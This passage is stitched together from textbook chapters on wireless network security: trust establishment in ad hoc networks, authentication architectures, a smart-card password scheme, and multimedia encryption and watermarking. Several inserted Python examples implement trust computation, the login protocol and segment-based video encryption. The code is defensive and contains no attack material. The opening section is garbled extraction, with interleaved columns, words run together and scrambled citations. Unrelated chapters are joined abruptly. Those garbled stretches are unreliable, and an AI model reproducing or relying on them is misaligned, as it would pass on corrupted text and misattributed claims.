(2004) assumes a minimum storage requirement changing of the network structure, every node is
to establish trust in mobile ad hoc networks. A assumed to be able to establish independent trust
centralized secret dealer is introduced into the relationship with at least two nodes.
network during the system bootstrapping phase When a node leaves the network properly, it
and is supposed to be trusted by all nodes. Every broadcasts information about its departure and
node is assumed to have a pair of public/private signs them. Consequently, the receiving nodes
key where the public key is known by the secret revokethecertificatethatwasissued - tothat
dealer. ing node. One major advantage of this solution
Inthefirstpart of
bootstrapping, every network lies in the fact that (1) it decreases the length of
node receives a pre-computed short list, say SL, the trust path, and (2) it is slightly affected by the
from the secret dealer. SL represents k tuples bind- dynamic nature of the ad hoc network. However,
ingnodeidentifierstorelatedpublic keys.These
guaranteeing that sufficient trust relation
bindings are distributed symmetrically, meaning exist in the network requires a large care during
thatifnodejreceivesthenodeidentifier ofiof
the selection and
value of k.
its corresponding public key, then node i will also On one hand, the work in Baras and Jiang
receivesnodeiidentifieranditspublic (2004)key.Intheto investigate the stability of trust
proposed
second part of the bootstrapping phase, each node establishment by modeling a MANET as an indirect
generates k certificates, one certificate for every
graph where edges represent pre-trust relations.
receivedbinding,assumingthateveryThe certificate
two authors cast the problem of trust com-


Trustworthy Networks

putation and evaluation by every individual node etc.). Finally, a TTP is an entity that is mutually
as a cooperative game and base it on elementary trusted by the supplicant and the authenticator and
voting methods. In Theodorakopoulos and Baras facilitating mutual authentication between the two
(2004), the process of trust relation establishment parties (Aboudagga, Refaei, Eltoweissy, DaSilva,
is formulated as a path problem on a weighted Quisquater,
& An
.)052 authenticationprocessis
directed graph. The vertices in the graph represent made up of a set of messages that are exchanged
the entities and a weighted edge (i, j) represents between these actors (as e illustrated by Figure
the opinion that entity i has about entity j. Such 2). Authentication includes four components as
opinion consists of two numbers: the trust value follows: (1) “S” denotes the supplicant; (2) “D”
and the confidence value. The trust value denotes is
the an
destination mobile node; (3) “As” de-
estimate of the trustworthiness of the target, while notes the authenticator; and (4) “Ad” denotes the
theconfidencevaluecorrespondstothe accuracy
destination authentication server. Adding a TTP
related to the assignment of the trust value. Using to this model introduces additional exchanged
the formal theory of semirings, one can show how messages in order to establish trust between the
two nodes can establish an indirect trust relation different interacting nodes.
without previous direct interaction. For that case,
two operators were developed allowing to combine Authentication Management
trust opinions along different paths and compute the Architecture
trust-confidencevaluebetweenpairofnodes.
An authentication system is based on an authenti-
cationprotocolthatfixestheinteractionbet
gEnErAl ModEls for the different components described previously.
AutHEntIcAtIon In wIrElEss The interaction is made using a set of messages
nEtworks between system components. In a wireless environ-
ment, node mobility offers many advantages, but
In addition to authentication solutions applied to at the same time it may affect the overall system
specificwirelesstechnologies,somegeneral efficiency. Consequently, deploying an
models - authenti
are introduced in wireless networks. This section cation system in a wireless environment needs to
discusses these models. consider several aspects including authenticators’
number and placements. The choice made on the
Actors in an Authentication system placement of these servers has an effect on the
time spent to authenticate a mobile node and the
Basically, an authentication system is composed of packet loss ratio. Typically, two strategies may
three actors: (1) a supplicant, (2) an authenticator, be adopted concerning the authentication servers
and (3) a trusted third party (TTP). The supplicant is placement. The former aims at placing authentica-
an entity that requests access to network resources. tion servers on the same network within mobile
It may be a person, or an application running on nodes.Thissolutionleadstoroutethetwotraf
a mobile node. The access to protected resources exchanged
( dataandauthenticationtraffic)withi
is gained only if the credentials provided by the the same network. Consequently, the contention
supplicant are validated by the authenticator. In an and the packet loss ratio are increased. However,
authenticationsystem,acredential theistime
anidentifier
spent during authentication is reduced
that is used by an authenticator to check whether compared with the second solution that aims to
the supplicant is authorized. It may be symmetric place authentication servers outside of the net-
key, a public/private key pair, a generated hash, work and thus forwarding authentication traf
or some contextual information such as physi- outwards. The latter solution reduces the packet
cal characteristic that uniquely - identifies a sup the network bandwidth for
loss ratio and liberates
plicant (e.g., GPS location, signal to noise ratio, useful traffic.
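The semiring-based trust computation of Theodorakopoulos and Baras (2004) described under Recent Advances in Trust Management, as an added worked example that is not code from the chapter or from that paper: opinions are (trust, confidence) pairs, one operator chains opinions along a path, the other chooses between parallel paths, and a generalised shortest-path relaxation derives the indirect opinion. The operator definitions are the path semiring as recalled here and should be treated as an assumption; the opinion graph and all function names are constructed for the example.

```python
"""Indirect trust computation on a weighted directed opinion graph (path semiring)."""
from typing import Dict, List, Optional, Tuple

Opinion = Tuple[float, float]          # (trust value, confidence value), each in [0, 1]
Graph = Dict[str, Dict[str, Opinion]]  # graph[i][j] = opinion that entity i holds about entity j

# Constructed example graph (not taken from the chapter).  A holds a weak-confidence direct
# opinion about D and has two indirect routes to D, through B and through C.
OPINIONS: Graph = {
    "A": {"B": (0.9, 0.8), "C": (0.6, 0.9), "D": (0.95, 0.3)},
    "B": {"D": (0.8, 0.7)},
    "C": {"D": (0.9, 0.5)},
    "D": {},
}

ZERO: Opinion = (0.0, 0.0)   # "no opinion": identity element of oplus
ONE: Opinion = (1.0, 1.0)    # full trust with full confidence: identity element of otimes


def otimes(a: Opinion, b: Opinion) -> Opinion:
    """Path operator: chaining two opinions along a path multiplies trust and confidence,
    so a derived opinion can never exceed the weakest link on the path."""
    return (a[0] * b[0], a[1] * b[1])


def oplus(a: Opinion, b: Opinion) -> Opinion:
    """Aggregation operator: of two parallel paths keep the more confident opinion,
    breaking ties in favour of the higher trust value."""
    if a[1] != b[1]:
        return a if a[1] > b[1] else b
    return a if a[0] >= b[0] else b


def indirect_trust(graph: Graph, source: str):
    """Generalised Bellman-Ford over the semiring: for every node, the best opinion `source`
    can derive about it along any path, plus the predecessor on that path.  Relaxation
    converges because otimes never raises trust or confidence."""
    best: Dict[str, Opinion] = {v: ZERO for v in graph}
    via: Dict[str, Optional[str]] = {v: None for v in graph}
    best[source] = ONE
    for _ in range(len(graph)):
        changed = False
        for u, edges in graph.items():
            for v, w in edges.items():
                cand = otimes(best[u], w)
                if cand != best[v] and oplus(best[v], cand) == cand:
                    best[v], via[v], changed = cand, u, True
        if not changed:
            break
    return best, via


def trust_path(via: Dict[str, Optional[str]], source: str, target: str) -> List[str]:
    """Reconstruct the path whose opinion was kept; empty if target is unreachable."""
    path = [target]
    while path[-1] != source:
        if via[path[-1]] is None:
            return []
        path.append(via[path[-1]])
    return path[::-1]


def accept(opinion: Opinion, min_trust: float, min_conf: float) -> bool:
    """Policy check a node applies before relying on a derived opinion."""
    return opinion[0] >= min_trust and opinion[1] >= min_conf


if __name__ == "__main__":
    best, via = indirect_trust(OPINIONS, "A")
    print("A's opinion about D:", best["D"], "via", trust_path(via, "A", "D"))
    print("accept D under (trust >= 0.7, confidence >= 0.5)?", accept(best["D"], 0.7, 0.5))
```

The more confident indirect route through B wins over A's direct but low-confidence opinion of D, which is the point of carrying confidence alongside trust.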


Figure 2. Exchanged messages in a hierarchical authentication model

Figure 3. Exchanged messages in a flat authentication model

When deploying an authentication system, a choice should be made concerning how authentication servers manage the credentials associated with authorized users. Basically, two architectures may be adopted. The former is an architecture where all authentication servers share the authentication status of all nodes in the network. This model reduces the amount of messages exchanged between interacting nodes, as shown by Figure 3, but holding all authentication information on each authentication server may introduce a processing overload, since the verification process is performed on all stored credentials. The second architecture that is deployed is hierarchical, where the authentication status of each node is known to a single authentication server. According to this approach, the number of exchanged messages during the authentication process is increased compared with the flat architecture.

Authentication Issues in Wireless Networks

Authentication is among the security services that should be considered in wireless networks. It allows the identification and the validation of credentials provided by users to access services. Deploying authentication in wireless networks needs to consider several issues, including:

• Mobility: Routes used between communicating nodes change with time and links are unreliable. As a result, exchanged packets may be lost. In ad hoc networks, a set of packets can be exchanged between nodes that belong to the same group. These packets hold information to update a group key. For example, losing these packets is similar to the node not having received the updated key from the group.
• Large key size: Large keys are desirable for their high entropy, but at the same time they would introduce processing overload and also require additional storage space at the mobile node.
• Reconnection activities: In wireless networks, connections are often reset and re-established by communicating devices. In this case, every reconnection requires fresh authentication parameters associated with the established sessions. This adds significant overhead.
• Continuous authentication checks: To prevent attacker attempts against authentication systems, authentication checks should be continuously performed. These checks introduce additional processing overhead and storage requirements.

In Wei and Wenye (2005), the impact of authentication on the security and quality of service (QoS) was quantitatively illustrated. A possible solution to key length could be sending a cryptographic hash instead of the whole key, but finding a generic cryptographic hash could be difficult for two reasons. First, in a wireless environment, devices are in most cases mobile. The conditions in which two samples (one sent by the user and the one held by the server) are taken vary considerably over time, since they are taken under different working conditions. Therefore, two samples of the same object, such as a fingerprint generated by two different sensors, are most likely not identical. Cryptographic hash functions, however, do not usually preserve distances, and hence two samples of the same object may result in different digests under different conditions.

Introducing sampling in the authentication process may be a solution to reduce bandwidth and power requirements in a wireless environment. As an example of schemes that follow this principle, LAWN is a remote authentication protocol that enables repetitive remote authentication with large keys (Arnab, Rajnish, & Umakishore, 2005). This approach is motivated by the concept of a holographic proof (Polishchuk & Spielman, 1994; Spielman, 1995). A holographic proof is a proof of some fact, so constructed that to verify the proof one does not need to scan through its entire length (Arnab et al., 2005). The verification process is limited to the examination of small parts randomly selected. According to this technique, a small sample of the authentication token is prepared, which can be used at the remote end to perform authentication with a high probability of correctness. This technique allows saving bandwidth and power, since if the length of the original authentication token is n, then the selected sample is only O(log n). As samples may be different, a function that computes the difference between the patterns is needed. This may be achieved by computing the Hamming distance, which gives as a result the number of bit positions in which two strings differ.

In the following, several general authentication techniques are detailed.

Password Authentication

Password authentication is among the solutions that are frequently required in wireless networks. Implementations according to this principle are vulnerable to multiple attacks that generally target stored passwords or passwords sent across the network. As a solution to these threats, a proposed scheme should include cryptographic techniques to protect stored credentials. Some security protocols are used to secure credentials. As an example of techniques that fulfil these needs, we mention the scheme proposed in I-En, Cheng-Chi, and Min-Shiang, which supports the Diffie-Hellman key agreement protocol over insecure networks and functions according to three phases: registration, login, and authentication. This scheme employs basic concepts such as the one-way hash function and the discrete logarithm problem. During the registration phase, the server assigns smart cards to the users requesting registration. The registration phase is performed only when a new user needs to join the system. However, the login and authentication phases are performed at each user login attempt. During registration, the user chooses an identifier (ID) and a password (PW) and computes h(PW) using a one-way function h. ID and h(PW) are sent to the server through a secure channel. After receiving the registration message, the server calculates $B = g^{h(x \oplus ID) - h(PW)} \bmod p$, where p is a large prime number initially selected by the server, and g is a primitive element in GF(p). After computing B, the server issues a smart card holding ID, B, p, g and delivers it to the user securely. During login, the user inserts the smart card into a terminal and introduces his/her ID and PW. Then, the terminal generates a login request message based on the introduced information and sends it to the server. At the server side, $B'' = g^{h(x \oplus ID) \cdot R} \bmod p$ is computed, where x is the server's secret key, ID is the user's identity, and R is a random number generated by the server. After that, the server calculates h(B'') and sends it, in addition to R, to the user. When received at the user side, the user's smart card computes $B' = (B \cdot g^{h(PW)})^{R} \bmod p$ and the validity of the server is checked by comparing h(B') and h(B'').

If the server is considered valid, the user's module computes $C = h(T \oplus B')$, where T is the timestamp associated with the current login; otherwise the server is considered invalid and the user moves again to the login phase. At this step, the user's module sends (ID, C, T) to the server. After receiving the request, the server performs the checks to determine whether the user is allowed
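The three phases of the smart-card scheme just described, run end to end with both sides' messages, as an added example that is not code from the chapter or from the scheme's authors. Assumptions, also marked in the comments: XOR is the combiner inside h(x ID) and h(T B'), exponents are reduced modulo p-1, a toy prime stands in for production-size parameters, and the server's final check recomputes h(T ⊕ B'') and bounds the age of T, which is how this example completes the step at which the excerpt breaks off.

```python
"""Worked run of the smart-card password scheme: registration, login, authentication."""
import hashlib
import secrets

# Toy group parameters, constructed for this example only: p = 2^61 - 1 (a Mersenne prime)
# and a fixed base g.  A deployment would use a standard large prime and a primitive root.
P = 2**61 - 1
G = 3


def h(*parts) -> int:
    """One-way function h: SHA-256 over its arguments (ints or bytes), returned as an int."""
    m = hashlib.sha256()
    for x in parts:
        if isinstance(x, int):
            x = x.to_bytes((x.bit_length() + 7) // 8 or 1, "big")
        m.update(x)
    return int.from_bytes(m.digest(), "big")


def h_xor(a: int, b: int) -> int:
    """h(a XOR b): the chapter writes h(x ID) and h(T B'); XOR is the combiner assumed here."""
    return h(a ^ b)


class Server:
    def __init__(self):
        self.x = secrets.randbelow(P - 2) + 1   # server's long-term secret key x
        self.pending = {}                        # ID -> (R, B'') for logins in progress

    def register(self, ID: int, h_pw: int) -> dict:
        """Registration phase (secure channel): receives ID and h(PW), issues the smart card."""
        exp = (h_xor(self.x, ID) - h_pw) % (P - 1)     # B = g^(h(x XOR ID) - h(PW)) mod p
        return {"ID": ID, "B": pow(G, exp, P), "p": P, "g": G}

    def challenge(self, ID: int):
        """Login phase, server side: B'' = g^(h(x XOR ID) * R) mod p for a fresh random R."""
        R = secrets.randbelow(P - 2) + 1
        B2 = pow(G, (h_xor(self.x, ID) * R) % (P - 1), P)
        self.pending[ID] = (R, B2)
        return h(B2), R                                  # sent to the user: h(B''), R

    def authenticate(self, ID: int, C: int, T: int, now: int, window: int = 60) -> bool:
        """Authentication phase: recompute h(T XOR B'') and compare with C.  This check and
        the freshness window on T are this example's completion of the step the excerpt
        cuts off; the original scheme's exact check may differ.  R is single use."""
        R, B2 = self.pending.pop(ID, (None, None))
        if B2 is None or abs(now - T) > window:
            return False
        return C == h_xor(T, B2)


class SmartCard:
    def __init__(self, card: dict):
        self.card = card                                 # holds ID, B, p, g

    def respond(self, PW: bytes, h_B2: int, R: int, T: int):
        """Login phase, user side: B' = (B * g^h(PW))^R mod p, validate the server through
        h(B') == h(B''), then answer with C = h(T XOR B').  None means the server failed."""
        B1 = pow(self.card["B"] * pow(G, h(PW), P) % P, R, P)
        if h(B1) != h_B2:
            return None                                  # server invalid: back to login
        return h_xor(T, B1)


def run_login(server: Server, card: SmartCard, PW: bytes, T: int, now: int):
    """One login attempt.  Returns (server accepted by user, user accepted by server)."""
    ID = card.card["ID"]
    h_B2, R = server.challenge(ID)
    C = card.respond(PW, h_B2, R, T)
    if C is None:
        return False, False
    return True, server.authenticate(ID, C, T, now)


def demo():
    """Registration, then a correct login, a wrong-password login, a stale-timestamp login
    and a replayed (ID, C, T) message.  All values are constructed."""
    server = Server()
    ID, PW = 1001, b"correct horse"
    card = SmartCard(server.register(ID, h(PW)))
    good = run_login(server, card, PW, T=1000, now=1000)
    bad_pw = run_login(server, card, b"wrong", T=1001, now=1001)
    stale = run_login(server, card, PW, T=1000, now=2000)
    h_B2, R = server.challenge(ID)                      # capture one valid exchange ...
    C = card.respond(PW, h_B2, R, 1002)
    first = server.authenticate(ID, C, 1002, 1002)
    replay = server.authenticate(ID, C, 1002, 1003)     # ... and resend it: R was consumed
    return good, bad_pw, stale, (first, replay)
```

With a wrong password the card derives a different B', so the server check fails on the user's side first: the card cannot tell a wrong PW from a server that does not know x.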


Multimedia Encryption

Figure 2. Experimental result of the image encryption algorithm: (a) original image; (b) encrypted image

(Lian, Sun, & Wang, 2004a). These algorithms obtain high perceptual security and encryption efficiency. In JPEG2000 image encryption, only the significant streams in the encoded data are encrypted (Ando, Watanabe, & Kiya, 2001, 2002; Lian, Sun, & Zhang, 2004b; Norcen & Uhl, 2003; Pommer & Uhl, 2003), which are selected according to the scalability in the space or frequency domain. These algorithms often remain secure in perception. Figure 2 gives the encryption result of the algorithm proposed in Lian et al. (2004b). As can be seen, the encrypted image is unintelligible. Additionally, in these algorithms, no more than 20% of the data stream is encrypted, which obtains high efficiency.

Partial video encryption. Compared with images or audio, videos are often of higher redundancy and are compressed in order to save transmission bandwidth. Among the video codecs, MPEG1/2, MPEG4, and H.264/AVC are more popular. Combined with them, some video encryption algorithms have been proposed, which save time cost by encrypting the compressed video data stream selectively or partially.

In the MPEG1/2 codec, the signs of DCT coefficients are encrypted with the video encryption algorithm (VEA) (Shi & Bhargava, 1998a), the signs of direct current coefficients (DCs) and motion vectors are encrypted with a secret key (Shi & Bhargava, 1998b), the base layer is encrypted while the enhancement layer is left unencrypted (Tosun & Feng, 2001a), the DCT coefficients are permuted (Lian, Wang, & Sun, 2004c; Tang, 1996), or the variable length coding (VLC) tables are modified by rearranging, random bit-flipping, or random bit-insertion (Wu & Kuo, 2000, 2001).

In the MPEG4 codec, the Minimal Cost Encryption Scheme (Kim, Shin, & Shin, 2005) is proposed to encrypt only the first 8 bytes in the macroblocks (MBs) of a video object plane (VOP). It

Figure 3. Video encryption based on AVC codec: (a) original; (b) encrypted (Ahn et al., 2004); (c) encrypted (Lian et al., 2005a)


is implemented and proved suitable for wireless terminals. A format-compliant configurable encryption framework (Wen, Severa, Zeng, Luttrell, & Weiyin, 2002) is proposed for MPEG4 video encryption, which can be reconfigured for a given application scenario, including wireless multimedia communication.

In the H.264/AVC codec, the intra-prediction mode of each block is permuted under the control of the key (Ahn, Shim, Jeon, & Choi, 2004), which degrades the video data greatly. Some other algorithms (Lian, Liu, & Ren, 2005a; Lian, Liu, Ren, & Wang, 2006a) encrypt the DCT coefficients and motion vectors with sign encryption. Since these algorithms encrypt both the texture information and the motion information, they often obtain high security in human perception. Figure 3 shows the results of the algorithm proposed in Ahn et al. (2004) and the one proposed in Lian et al. (2005a). As can be seen, the video encrypted by the former algorithm is still intelligible, while the video encrypted by the latter algorithm is unintelligible. Thus, for high security, the latter encryption algorithm is preferred.

Communication Compliant Encryption

Multimedia data are often encrypted before being transmitted. In the encrypted data stream, transmission errors are often spread out due to the encryption algorithms' ciphertext sensitivity (Mollin, 2006). In wireless/mobile applications, some means should be taken to reduce the error propagation. Constructing the encryption algorithms based on error correction codes may be a solution. For example, an encryption algorithm based on forward error correction (FEC) code is proposed in Tosun and Feng (2001b), which permutes the information bits and complements a subset of the bits. The encryption algorithm can preserve the error robustness of the encrypted multimedia data, that is, the encrypted data stream can realize error correction itself. Additionally, the encryption algorithm is implemented very efficiently because of the simple encryption operations. Thus, it has some desirable properties suitable for wireless multimedia transmission. However, the disadvantage is also clear: it is not secure against known-plaintext attacks.

Another solution is to change the block length in data encryption. Generally, the block length is in close relation with the error propagation property. Taking stream ciphers and block ciphers as examples, the former have low error propagation, while the latter often have high error propagation. Generally, the bigger the block length is, the higher the error propagation is. Due to this, a robust encryption scheme for secure image transmission over wireless channels is proposed in Nanjunda,

Figure 4. Robust video encryption based on segments (diagram: the video with master key K is split into Frame 0 … Frame N-1 with keys K0 … KN-1; each frame is split into Slice 0 … Slice M-1, all slices of a frame sharing that frame's key)

Figure 5. Scalable encryption scheme for MPEG2 video (diagram: compressed media data with base, middle and enhancement layers; the base and middle layers are encrypted, the enhancement layer is cut during operation, and the remaining layers are decrypted)

Haleem, and Chandramouli (2005), which varies the block length according to the channel's error properties. This method obtains a trade-off between security and error robustness. However, some problems should be solved beforehand, for example, how to transmit the parameters for varying the block length, and how to determine the channel's error properties in advance.

Additionally, segment-based encryption algorithms are proposed to reduce the effect caused by transmission errors. By partitioning the plaintext into segments and encrypting each segment independently, the transmission errors can be limited to a segment. The only difficulty is to synchronize segments. An example proposed in Lian, Liu, Ren, and Wang (2005b) is shown in Figure 4. It encrypts advanced video coding (AVC) videos according to the following steps: (1) partition the video data into N frames (each frame acts as a segment), (2) partition each frame into M macroblocks (each macroblock acts as a subsegment), and (3) encrypt each frame with a different key (K0, K1, …, KN-1), and encrypt all the macroblocks in a frame with the same key. Thus, if a macroblock is lost, the other macroblocks can still be recovered correctly. If a frame is lost, the frame index can be used to synchronize the key and recover the other frames correctly. Thus, if the synchronization problem is solved, segment-based encryption will be a good solution in wireless/mobile applications.

Direct Operation Supported Encryption

Operating on encrypted multimedia data directly, without decryption, is challenging while cost efficient. Especially in a wireless/mobile environment, no decryption and re-encryption operations are required, which saves much cost. Some solutions have been proposed to realize direct transcoding or bit rate conversion.

A secure transcoding scheme is proposed in Chang, Han, Li, and Smith (2004). In this scheme, the multimedia data are decomposed into multiple streams at the source, each stream is encrypted independently, and each stream is annotated with cleartext metadata. In transcoding, lower priority streams are dropped directly based on the cleartext metadata. The receiver can decrypt the remaining streams and recombine them into the transcoded output stream.

As progressive and scalable encoding becomes more and more popular, such as JPEG2000, MPEG4 FGS, SVC, and so forth, scalable encryption is focused on, which supports direct bit rate conversion. The scalable encryption algorithm encrypts the progressive or scalable data streams, for example, base layer, middle layer, or enhancement layer, one by one from the most significant ones to the least significant ones. Thus, the bit rate can be changed by cutting the insignificant streams directly. For example, Tosun and Feng (2000) proposed the algorithm shown in


Figure 5, which encrypts only the base layer and middle layer of the three layers (base layer, middle layer, and enhancement layer) of an MPEG2 video stream. In this algorithm, the enhancement layer is left unencrypted, so it can be cut off directly. Wee and Apostolopoulos (2001, 2003) and Zhu, Yuan, Wang, and Li (2005) proposed algorithms for secure scalable streaming enabling transcoding without decryption. Generally, the stream is partitioned into segments according to the cipher's code length. To change the bit rate, some segments at the end of the stream are cut off directly.

The Watermarking Algorithms for Wireless Multimedia

Watermarking algorithms (Barni & Bartolini, 2004; Cox et al., 2002) are generally composed of two parts, that is, watermark embedding and watermark extraction/detection. Generally, watermarking algorithms should be robust to some operations, such as recompression, A/D or D/A conversion, noise, filtering, and so forth, and survive such attacks as the geometric attack, collusion attack, copy attack, and so forth. Similar to encryption algorithms, some watermarking algorithms may be of high security and robustness, but they are also of high time or energy cost. On the contrary, the watermarking algorithms with low cost are often of low security or robustness. This contradiction becomes a problem in a wireless/mobile environment where only limited energy or computing capability is provided. Experiments have been done to analyze the energy consumption, complexity and security level of multimedia watermarking on mobile handheld devices (Kejariwal, Nicolau, Dutt, & Gupta, 2005), and some conclusions are drawn: (1) the security level often contradicts with energy consumption, (2) watermark extraction/detection may be of higher cost than watermark embedding, and (3) image resolution affects the energy consumption. To conquer these problems, some proposals are presented, for example, introducing a tunable parameter to obtain trade-offs between security level, energy consumption, and other performance measures, or moving some computationally expensive tasks to mobile proxies.

Mobile Agent Based Task Partitioning

Mobile agents use the proxies as agents that can connect to a range of heterogeneous mobile terminals. Using mobile agents to reduce the load of the server or terminals has been widely studied (Burnside et al., 2002; Rao, Chang, Chen, & Chen, 2001). If the mobile agent can implement watermark embedding or extraction/detection, then the terminals' computing load will be greatly reduced.
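The segment-based scheme of Figure 4 (frames as segments, one key per frame, independently decryptable macroblocks) and the layer-cutting scheme of Figure 5 (encrypt the base and middle layers, leave the enhancement layer in the clear behind cleartext metadata so a transcoder can drop it without a key), as one added example that is not code from the chapter or from the cited papers. A SHA-256 counter-mode keystream stands in for the cipher the chapter leaves unspecified; all keys, frames, layers and function names are constructed for the example.

```python
"""Segment-based video encryption (Figure 4) and layer-cutting scalable encryption (Figure 5)."""
import hashlib
from typing import Dict, List, Optional


def subkey(master: bytes, label: bytes) -> bytes:
    """Derive an independent key from the master key and a public label (frame index, layer name)."""
    return hashlib.sha256(master + label).digest()


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """SHA-256 in counter mode: a stand-in for the chapter's unspecified cipher so the example
    runs on the standard library alone.  The structure around it, not the cipher, is the point."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR with the keystream; the same call encrypts and decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))


# --- Segment-based encryption: frames are segments, macroblocks are subsegments ----------

def frame_key(master: bytes, i: int) -> bytes:
    """K_i for frame i.  It depends only on the frame index, so a receiver that lost frame
    i-1 still derives K_i: the index is the synchronisation the chapter asks for."""
    return subkey(master, b"frame" + i.to_bytes(4, "big"))


def encrypt_frames(master: bytes, frames: List[List[bytes]]) -> List[List[bytes]]:
    """Every macroblock of frame i is encrypted under K_i.  The macroblock index is the nonce,
    so a damaged or lost macroblock never affects its neighbours."""
    return [[crypt(frame_key(master, i), j.to_bytes(4, "big"), mb) for j, mb in enumerate(frame)]
            for i, frame in enumerate(frames)]


def decrypt_frames(master: bytes, received: Dict[int, List[Optional[bytes]]]):
    """received: frame index -> macroblocks as delivered; None marks a lost macroblock."""
    return {i: [None if mb is None else crypt(frame_key(master, i), j.to_bytes(4, "big"), mb)
                for j, mb in enumerate(frame)]
            for i, frame in received.items()}


def demo_segments():
    """Constructed 3-frame clip, 4 macroblocks per frame.  Frame 1 is lost in transit and one
    macroblock of frame 2 is corrupted; every other macroblock must still decrypt correctly."""
    master = b"constructed-master-key"
    frames = [[bytes([f * 16 + m]) * 8 for m in range(4)] for f in range(3)]
    ct = encrypt_frames(master, frames)
    damaged = bytes([ct[2][2][0] ^ 0x80]) + ct[2][2][1:]          # bit flip in frame 2, MB 2
    received = {0: ct[0], 2: [ct[2][0], ct[2][1], damaged, ct[2][3]]}
    pt = decrypt_frames(master, received)
    frame0_ok = pt[0] == frames[0]
    frame2_ok = [pt[2][m] == frames[2][m] for m in range(4)]
    return frame0_ok, 1 not in pt, frame2_ok        # -> True, True, [True, True, False, True]


# --- Scalable encryption: encrypt the significant layers, cut the rest without any key ---

ENCRYPTED_LAYERS = ("base", "middle")             # the enhancement layer stays in the clear


def encrypt_layers(master: bytes, layers: Dict[str, bytes]) -> dict:
    """Package = cleartext metadata plus per-layer data.  The metadata names the layers in
    significance order and says which are encrypted, so a transcoder needs no key to cut."""
    data = {name: crypt(subkey(master, b"layer:" + name.encode()), b"", blob)
            if name in ENCRYPTED_LAYERS else blob
            for name, blob in layers.items()}
    return {"metadata": {"order": list(layers), "encrypted": list(ENCRYPTED_LAYERS)},
            "layers": data}


def cut_layers(package: dict, keep: int) -> dict:
    """Bit rate reduction at a transcoder: keep the first `keep` layers of the metadata order
    and drop the least significant ones, touching no ciphertext."""
    order = package["metadata"]["order"][:keep]
    return {"metadata": {**package["metadata"], "order": order},
            "layers": {n: package["layers"][n] for n in order}}


def decrypt_layers(master: bytes, package: dict) -> Dict[str, bytes]:
    """Receiver side: decrypt whichever encrypted layers survived the cut."""
    return {name: crypt(subkey(master, b"layer:" + name.encode()), b"", blob)
            if name in package["metadata"]["encrypted"] else blob
            for name, blob in package["layers"].items()}


def demo_layers():
    """Three constructed layers; the transcoder drops the enhancement layer without the key,
    and the receiver recovers base and middle."""
    master = b"constructed-master-key"
    layers = {"base": b"B" * 16, "middle": b"M" * 16, "enhancement": b"E" * 32}
    reduced = cut_layers(encrypt_layers(master, layers), keep=2)
    return decrypt_layers(master, reduced)          # -> {"base": b"B"*16, "middle": b"M"*16}
```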

Figure 6. Watermarking tasks partitioning based on mobile agents

Figure 7. Architectures of some lightweight watermarking algorithms: (a) fast transformation based watermarking embedding (media data → fast transformation → watermark embed → fast inverse transformation → watermarked media data); (b) watermarking embedding in compressed media data (compressed media data → partial reconstruction → watermark embed → partial encoding → watermarked media data)

The scheme proposed in Liu and Jiang (2005), as shown in Figure 6, uses a mobile agent in place of the terminals to realize watermark detection, which decreases the server and network load during watermark detection. In another scheme (Kejariwal, Gupta, Nicolau, Dutt, & Gupta, 2004), the watermark embedding and detection tasks are both partitioned and moved to mobile proxies completely or partially. For example, to keep the scheme secure, only tasks not sensitive to security are moved out, such as image transformation, bit decomposition, plane alignment, and so forth. The partitioning schemes make watermarking applications more practical in a mobile environment.

Lightweight Watermarking Algorithms

Using mobile agents to implement some watermarking related tasks can reduce the load of the server or terminals to some extent. However, frequent interactions between the mobile agent and the terminals are still costly. To reduce the cost of the server or terminals, improving the efficiency of watermark embedding or extraction/detection algorithms is a key problem. Considering that the watermark is often embedded into the transformation domain, some lightweight algorithms are proposed to implement transformation domain watermarking. Two typical ones are shown in Figure 7. The first one, as shown in Figure 7a, uses fast transformations to reduce the cost of converting media data into the frequency domain. The second one, as shown in Figure 7b, embeds the watermark into the compressed media data according to the following steps: (1) reconstruct the coefficients partially from the compressed data stream, (2) embed the watermark into the selected coefficients, and (3) re-encode the watermarked coefficients. In the following content, some lightweight watermarking algorithms are introduced and analyzed.

A scalable watermarking algorithm is proposed to mark audio data encoded with Advanced Audio Zip (AAZ) (Li, Sun, & Lian, 2005). In this algorithm, the watermark is embedded into the quantized modified discrete cosine transform (MDCT) coefficients in the core layer adaptively, and detected by computing the correlation between the spreading sequence and the bitstream. A speech watermarking scheme is proposed in Arora and Emmanuel (2003), which is designed based on the adaptive modulation of spread spectrum sequences and is robust against some removal or impairment attacks. The experiments in global system for mobile communications (GSM) cellular communications show that the algorithm is suitable for mobile applications.


For images, an efficient steganography scheme (Pal, Saxena, & Muttoo, 2004) is proposed for resource constrained wireless networks. In this scheme, the coefficients in the Hadamard transform domain are manipulated to contain some hidden information. The Discrete Hadamard Transform can be implemented using fast algorithms, which makes the scheme computationally efficient and practical in mobile communications.

For videos, a spread spectrum watermarking algorithm (Petrescu, Mitrea, & Preteux, 2005) is proposed to protect low rate videos. In this algorithm, the DCT or wavelet coefficients of the transformed video data are watermarked with spread spectrum sequences. Experiments are done for videos varying from 64 kbit/s to 256 kbit/s, and suitable transparency or robustness is obtained. Furthermore, a more efficient algorithm (Checcacci, Barni, Bartolini, & Basagni, 2000) is proposed to mark MPEG4 videos. In this algorithm, only the Luma macroblocks are watermarked by adjusting the coefficients' values in each coefficient pair. It is proved efficient in implementation and robust to transmission errors. Additionally, a more robust video watermarking algorithm (Alattar, Lin, & Celik, 2003) is proposed for low bit rate MPEG4 videos. In this algorithm, the watermark is composed of both the synchronization template and the watermark content combined with the template, and the watermark is embedded into the alternating current (AC) coefficients of the luminance plane of the VOPs. The template can survive geometric attacks, such as transcoding, cropping, scaling, rotation, noise, and so forth. Experiments on various videos are done, which show good performance for video rates ranging from 128 kbit/s to 768 kbit/s.

Communication Compliant Algorithms

In wireless/mobile communication, transmission errors often happen, which may reduce the watermark detection rate. Generally, several means may be adopted to improve the watermarking algorithm's robustness against transmission errors. The first one, as shown in Figure 8a, is applying

Figure 8. Architectures of some robust watermarking algorithms: (a) ECC based watermarking scheme (watermark → ECC encode → watermark embed into media data → watermark extract → ECC decode → extracted watermark); (b) MDC based watermarking scheme (watermark → MDC encode → watermark embed into media data → MDC encode → MDC decode → watermark extract → MDC decode → extracted watermark)

